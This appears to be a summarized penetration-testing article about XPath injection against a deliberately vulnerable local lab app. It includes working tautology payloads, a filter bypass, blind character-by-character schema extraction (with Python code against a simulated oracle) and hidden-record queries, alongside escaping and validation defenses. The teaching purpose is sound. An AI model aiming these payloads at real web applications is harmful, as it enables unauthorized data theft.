Exploiting XPath Injection Weaknesses

This article demonstrates practical XPath injection techniques against a vulnerable BookFinder web app, including lab setup, detection via syntax errors, payload crafting to bypass filters, and schema extraction using XPath functions. It also documents defenses such as parameterized queries, input validation, whitelisting, escaping, and proper error handling.

Keypoints

  • Provides steps to set up a vulnerable lab from the NetSPI GitHub repo and run it in Docker (bookapp on localhost:8888).
  • Shows how injecting special characters (e.g., single quote) can trigger XPath parser errors indicating an injection point (XPathException).
  • Demonstrates common test payloads (' or '1'='1) and techniques to bypass defenses that block '=' by using other comparison operators such as '<' or functions like contains().
  • Details schema discovery and data extraction using XPath functions: string-length(), starts-with(), count(), and contains() to enumerate root/node names and node counts.
  • Explains automating character-by-character extraction with Burp Suite Intruder (cluster bomb) to derive node names such as “Books” and “Book”.
  • Shows extracting unpublished or hidden records by querying attributes (e.g., contains(@published, 'false')).
  • Lists practical mitigations: parameterized XPath, input validation/whitelisting, escaping special characters, least privilege, and safe error handling.
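
The validation and escaping mitigations in the last key point can be sketched in a few lines of Python. This is a minimal illustration under stated assumptions, not the lab's own code: the allow-list pattern, the function names, and the Title element in the query are hypothetical (only Books and Book come from the article). Where the XPath library supports variables, a parameterized query remains the preferable option; escaping is shown here because it needs nothing beyond string handling.

```python
import re

# Hypothetical allow-list: letters, digits, spaces and a little punctuation.
# Note that it also rejects legitimate titles containing an apostrophe.
ALLOWED_TITLE = re.compile(r"[A-Za-z0-9 .,:\-]{1,100}")


def is_valid_title(value: str) -> bool:
    """Return True only if the whole input matches the allow-list."""
    return ALLOWED_TITLE.fullmatch(value) is not None


def xpath_literal(value: str) -> str:
    """Quote a string as an XPath 1.0 string literal.

    XPath 1.0 has no escape character inside string literals, so a value
    containing both quote types has to be assembled with concat().
    """
    if "'" not in value:
        return "'" + value + "'"
    if '"' not in value:
        return '"' + value + '"'
    parts = value.split("'")
    # Rejoin the pieces with a double-quoted apostrophe between them.
    return "concat(" + ", \"'\", ".join("'" + p + "'" for p in parts) + ")"


def build_query(title: str) -> str:
    """Validate first, then embed the value as a literal.

    The element name Title is an assumption made for this sketch.
    """
    if not is_valid_title(title):
        raise ValueError("title contains characters outside the allow-list")
    return "/Books/Book[Title=" + xpath_literal(title) + "]"
```

With this sketch, build_query("Dune") yields /Books/Book[Title='Dune'], while the tautology payload ' or '1'='1 is rejected by the allow-list before any query is built.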

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Injection of malicious XPath expressions into a web endpoint to manipulate XML queries (e.g., a request causing “System.Xml.XPath.XPathException: This is an unclosed string.”).
  • [T1213] Data from Information Repositories – Extracting XML schema and hidden data by abusing XPath functions to enumerate element names, counts, and attributes (e.g., “' or contains(@published, 'false') or'”).

Indicators of Compromise

  • [Repository URL] lab source – https://github.com/NetSPI/XPath-Injection-Lab.git
  • [Endpoint] vulnerable web app – http://localhost:8888 (POST /Home/FindBook), Host: localhost:8888
  • [Error/Stacktrace] XPath parser error returned – “System.Xml.XPath.XPathException: This is an unclosed string.”
  • [Payload examples] injection strings seen in requests – “' or '1'='1”, “' or string-length(name(/*)) < 0 or '”, “' or contains(@published, 'false') or'”
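
To see why the payload strings listed above are effective, it helps to substitute them into a query that is built by string concatenation. The sketch below assumes a hypothetical template; the lab's real query is not shown in this summary, and the Title element is an illustrative name. The quote-counting helper is only a rough heuristic for the "unclosed string" condition, not a parser.

```python
# Hypothetical template: the lab's actual XPath query is not shown here.
QUERY_TEMPLATE = "/Books/Book[Title='{term}']"


def build_unsafe_query(term: str) -> str:
    """Concatenate user input straight into the query (the vulnerable pattern)."""
    return QUERY_TEMPLATE.format(term=term)


def has_balanced_single_quotes(query: str) -> bool:
    """Rough heuristic: an odd number of single quotes leaves a literal unclosed."""
    return query.count("'") % 2 == 0


if __name__ == "__main__":
    for payload in ["Dune", "'", "' or '1'='1"]:
        query = build_unsafe_query(payload)
        print(repr(payload), "->", query, "| balanced:", has_balanced_single_quotes(query))
```

A lone single quote leaves the literal unclosed, which is the condition the XPathException reports; the tautology payload closes the literal cleanly and appends a condition that is always true.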

Lab setup and exploitation procedure (technical summary)

Clone and run the vulnerable app locally by running these commands in order: git clone https://github.com/NetSPI/XPath-Injection-Lab.git; cd XPath-Injection-Lab; docker build -t bookapp .; docker run -p 8888:80 bookapp. The last command publishes the container's port 80 on host port 8888. Point a proxy (e.g., Burp Suite) at http://localhost:8888 and observe the POST /Home/FindBook requests.

Identify injection points by submitting special characters (e.g., a single quote) and watching for XPath parser errors (e.g., “System.Xml.XPath.XPathException: This is an unclosed string.”). If '=' is blocked by filters, craft payloads that avoid it by using other comparison operators such as '<' or functions like contains(). Example test payloads: ' or '1'='1, " or "1"="1, and variations using '<' such as ' or '1' < '2, which evaluates to true because XPath 1.0 converts both operands of '<' to numbers before comparing them.
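
The detection and filter-bypass steps above can be sketched as two small checks. This is an illustrative sketch under assumptions: the filter is a hypothetical one that rejects any input containing '=', the function names are invented for the example, and the third candidate payload is an added illustration of the contains() approach rather than a string taken from the article.

```python
# Markers taken from the error message quoted in the article.
XPATH_ERROR_MARKERS = (
    "System.Xml.XPath.XPathException",
    "This is an unclosed string",
)


def looks_like_xpath_error(body: str) -> bool:
    """Return True if a response body contains an XPath parser error marker."""
    return any(marker in body for marker in XPATH_ERROR_MARKERS)


def naive_filter_blocks(payload: str) -> bool:
    """Hypothetical server-side filter that rejects any input containing '='."""
    return "=" in payload


CANDIDATES = [
    "' or '1'='1",                     # classic tautology, uses '='
    "' or '1' < '2",                   # numeric comparison, no '='
    "' or contains('abc', 'a') or '",  # illustrative function-based variant
]


def payloads_passing_filter(candidates):
    """Keep only the payloads the hypothetical '=' filter would let through."""
    return [p for p in candidates if not naive_filter_blocks(p)]


if __name__ == "__main__":
    for payload in payloads_passing_filter(CANDIDATES):
        print(payload)
```

In practice the response bodies would come from the proxy history or from replayed requests; the sketch only shows the decision logic applied to them.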

Enumerate and extract the XML structure using XPath functions:

  • Determine the length of the root element name with string-length(name(/*)).
  • Recover the name one character at a time with starts-with(name(/*), 'X'), extending the tested prefix after each hit; automating this with Burp Intruder (cluster bomb) yields “Books”.
  • Count the root's child nodes with count(/*[1]/*) to find the number of entries.
  • Find the length of the child node name with string-length(name(/*[1]/*)) and extract the name with starts-with() in the same way.
  • Retrieve hidden records by querying attributes (e.g., ' or contains(@published, 'false') or' to surface unpublished Book entries).

Defenses: use parameterized XPath, strict input validation/whitelists, escape special characters, apply least privilege to XML data access, and suppress detailed error messages.
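
The character-by-character extraction described above follows a simple loop, sketched here without any network code. Everything in it is an assumption for illustration: the oracle is any callable that reports whether an injected condition held (for instance, whether the response listed books), the payload wrapper mirrors the ' or ... or ' shape of the payloads quoted in this article, and make_fake_oracle is a stand-in for the real application so the loop can be run offline. The length probe uses '=', so it would need adapting if a filter blocks that character.

```python
import re
import string
from typing import Callable, Optional

Oracle = Callable[[str], bool]  # True when the injected condition evaluated to true

ALPHABET = string.ascii_letters + string.digits + "_-."


def wrap(condition: str) -> str:
    """Embed a boolean XPath condition in the ' or ... or ' payload shape."""
    return "' or " + condition + " or '"


def find_length(oracle: Oracle, target: str, max_len: int = 64) -> Optional[int]:
    """Probe string-length(target) until the oracle reports a match."""
    for n in range(1, max_len + 1):
        if oracle(wrap(f"string-length({target})={n}")):
            return n
    return None


def extract_name(oracle: Oracle, target: str) -> Optional[str]:
    """Grow a prefix one character at a time using starts-with()."""
    length = find_length(oracle, target)
    if length is None:
        return None
    name = ""
    for _ in range(length):
        for ch in ALPHABET:
            if oracle(wrap(f"starts-with({target}, '{name + ch}')")):
                name += ch
                break
        else:
            return None  # no character in ALPHABET matched at this position
    return name


def make_fake_oracle(target: str, secret: str) -> Oracle:
    """Offline stand-in for the application: answers probes about `secret`."""
    length_re = re.compile(re.escape(f"string-length({target})=") + r"(\d+)")
    prefix_re = re.compile(re.escape(f"starts-with({target}, '") + r"([^']*)'\)")

    def oracle(payload: str) -> bool:
        m = length_re.search(payload)
        if m:
            return int(m.group(1)) == len(secret)
        m = prefix_re.search(payload)
        return bool(m) and secret.startswith(m.group(1))

    return oracle


if __name__ == "__main__":
    root_oracle = make_fake_oracle("name(/*)", "Books")
    print(extract_name(root_oracle, "name(/*)"))
```

Against the lab, the oracle would instead send the payload in the POST /Home/FindBook request and inspect the response, which is the role Burp Intruder plays in the article.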

Read more: https://www.netspi.com/blog/technical/web-application-penetration-testing/exploiting-xpath-injection-weaknesses/